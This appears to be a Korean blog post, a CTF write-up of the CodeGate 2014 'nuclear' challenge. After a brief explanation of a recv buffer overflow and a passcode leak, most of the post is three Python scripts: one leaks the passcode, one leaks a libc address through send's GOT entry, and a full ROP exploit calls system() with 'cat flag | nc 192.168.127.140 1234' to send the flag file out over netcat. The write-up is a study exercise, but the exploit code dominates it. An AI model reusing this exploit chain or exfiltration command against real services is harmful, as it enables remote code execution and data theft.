ctf

[CodeGate 2014 CTF] nuclear

woodonggyu 2016. 4. 19. 20:38

 

buf 의 크기는 512byte 이지만 recv 함수를 통해 1298byte 만큼 입력받아 overflow 취약점이 존재한다.

 

 

해당 취약점이 존재하는 함수로 이동하기 위해 passcode 를 알아내야 한다. passcode v4, v5를 널바이트 없이 연결해주면 passcode가 나온다. __iso99_sscanf(&buf, "%f/%f", v5, v4); 를 이용하면 passcode를 leak 할 수 있다.

 

 

- - - - - - - - - - - - - - - - - - - -   passcode_leak.py - - - - - - - - - - - - - - - - - - - - -

 

from socket imort *

from struct import *

import time

 

s = socket(AF_INET, SOCK_STREAM)

s.connect(('192.168.127.140', 1129))

 

up = lambda x: unpack("<L", x)[0]

 

payload = "A"*512

 

print s.recv(1024)

time.sleep(1)

 

s.send("target" + "\n")

print s.recv(1024)

time.sleep(1)

 

s.send("123.123123/123.123123" + "\n")

print s.recv(1024)

time.sleep(1)

 

s.send(payload + "\n")

print s.recv(1024)

time.sleep(1)

 

print "[*] leak passcode!!"

print "[*] passcode = " + s.recv(1024)[542:]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 

 

- - - - - - - - - - - - - - - - - - - -  libc_leak.py - - - - - - - - - - - - - - - - - - - - -

from socket import *

from struct import *

import time

 

p = lambda x: pack("<L", x)

up = lambda x: unpack("<L", x)[0]

 

send_plt = 0x08048900

send_got = 0x0804b07c

p4ret = 0x0804917c

offset = 0xfd0

 

passcode = "what is passcode?"

 

payload = "A"*528

payload += p(send_plt)

payload += p(p4ret)

payload += p(4)

payload += p(send_got)

payload += p(4)

payload += p(0)

 

s = socket(AF_INET, SOCK_STREAM)

s.connect(('192.168.127.140', 1129))

 

print s.recv(1024)

time.sleep(1)

 

s.send("launch" + "\n")

print s.recv(1024)

 

s.send(passcode + "\n")

print s.recv(1024)

 

s.send(payload + "\n")

print s.recv(1024)

 

send_libc = up(s.recv(4))

system_libc = send_libc + offset

 

print "[*] leak libc!!"

print "[*] send_libc = " + hex(send_libc)

print "[*] system_libc = " + hex(system_libc)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 

- - - - - - - - - - - - - - - - - - - - - - exploit.py - - - - - - - - - - - - - - - - - - - - -

from socket import *

from struct import *

import time

 

p = lambda x: pack("<L", x)

up = lambda x: unpack("<L", x)[0]

 

recv_plt = 0x080488e0

p4ret = 0x0804917c

system_libc = 0xb76eb210

bss = 0x0804b088

 

cmd = "cat flag | nc 192.168.127.140 1234"

passcode = "what is passcode?"

 

payload = "A"*528

payload += p(recv_plt)

payload += p(p4ret)

payload += p(4)

payload += p(bss)

payload += p(len(cmd))

payload += p(0)

 

payload += p(system_libc)

payload += "AAAA"

payload += p(bss)

 

s = socket(AF_INET, SOCK_STREAM)

s.connect(('192.168.127.140', 1129))

 

print s.recv(1024)

time.sleep(1)

 

s.send("launch" + "\n")

print s.recv(1024)

 

s.send(passcode + "\n")

print s.recv(1024)

 

s.send(payload + "\n")

print s.recv(1024)

 

s.send(cmd + "\n")

print s.recv(1024)

 

s.close()

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

저작자표시 비영리 변경금지 (새창열림)